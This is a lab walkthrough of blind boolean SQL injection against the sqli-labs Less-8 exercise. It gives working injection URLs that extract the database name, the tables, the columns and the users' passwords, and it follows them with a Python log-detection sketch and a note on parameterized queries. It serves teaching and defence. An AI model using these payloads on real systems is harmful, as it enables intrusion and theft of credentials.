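Less-8 has no position on the page where query output or errors are echoed, so blind injection is needed; this walkthrough uses boolean-based blind injection with Burp (Intruder).
Guess the length of the database name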
Less-8/?id=1'and (length(database()))=1 --+
This reveals that the database name is 8 characters long.
Guess the current database name using ASCII codes
Less-8/?id=1%27%20and%20(ascii(substr(database(),1,1)))=100%20--+
This reveals the database name: security
Guess the table names
Less-8/?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)))=117 --+
This reveals a table named users
Guess the column names
Less-8/?id=1%27%20and%20(ascii(substr((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27and%20table_name=%27users%27%20limit%203,1),1,1)))=117%20--+
This reveals the column name password; the column name username can be recovered the same way.
Extract the data
http://localhost/sqli-labs-master/Less-8/?id=1%27%20and%20(ascii(substr((select%20password%20from%20users%20limit%200,1),1,1)))=117%20--+
This reveals the first user's password.
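
Seen from the server side, the Intruder runs above leave a recognisable trail: one client sends the same query shape many times, changing only the numbers. The following detection sketch is an added example, not part of the original walkthrough; the log entries are constructed, and the names `PROBE`, `template` and `detect` are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample entries (client IP, request path); not real traffic.
SAMPLE_LOG = [
    ("10.0.0.5", "/Less-8/?id=1%27%20and%20(ascii(substr(database(),1,1)))=100%20--+"),
    ("10.0.0.5", "/Less-8/?id=1%27%20and%20(ascii(substr(database(),1,1)))=101%20--+"),
    ("10.0.0.5", "/Less-8/?id=1%27%20and%20(ascii(substr(database(),1,1)))=115%20--+"),
    ("10.0.0.5", "/Less-8/?id=1%27%20and%20(ascii(substr(database(),2,1)))=101%20--+"),
    ("10.0.0.5", "/Less-8/?id=1'and (length(database()))=7 --+"),
    ("10.0.0.5", "/Less-8/?id=1'and (length(database()))=8 --+"),
    ("10.0.0.7", "/Less-8/?id=1%27%20and%20(ascii(substr(database(),1,1)))=100%20--+"),
    ("10.0.0.9", "/Less-8/?id=1"),
    ("10.0.0.9", "/Less-8/?id=2"),
]

# SQL constructs that the requests in this walkthrough rely on.
PROBE = re.compile(
    r"\b(?:ascii|ord)\s*\(\s*(?:substr|substring|mid)\s*\("
    r"|\blength\s*\(\s*database\s*\("
    r"|information_schema",
    re.IGNORECASE,
)

def template(path):
    """URL-decode, lowercase and replace every integer with N, so requests
    that differ only in position or compared value share one template."""
    return re.sub(r"\d+", "N", unquote_plus(path).lower())

def detect(entries, min_variants=3):
    """Return {(ip, template): variant_count} for clients that sent at least
    min_variants distinct probe requests sharing the same template."""
    seen = defaultdict(set)
    for ip, path in entries:
        decoded = unquote_plus(path)
        if PROBE.search(decoded):
            seen[(ip, template(path))].add(decoded)
    return {key: len(v) for key, v in seen.items() if len(v) >= min_variants}

if __name__ == "__main__":
    for (ip, tpl), count in detect(SAMPLE_LOG).items():
        print(f"{ip}: {count} variants of {tpl}")
```

Raising `min_variants` lowers false positives from one-off requests; the durable fix is still a parameterized query for `id`, which makes the appended condition inert.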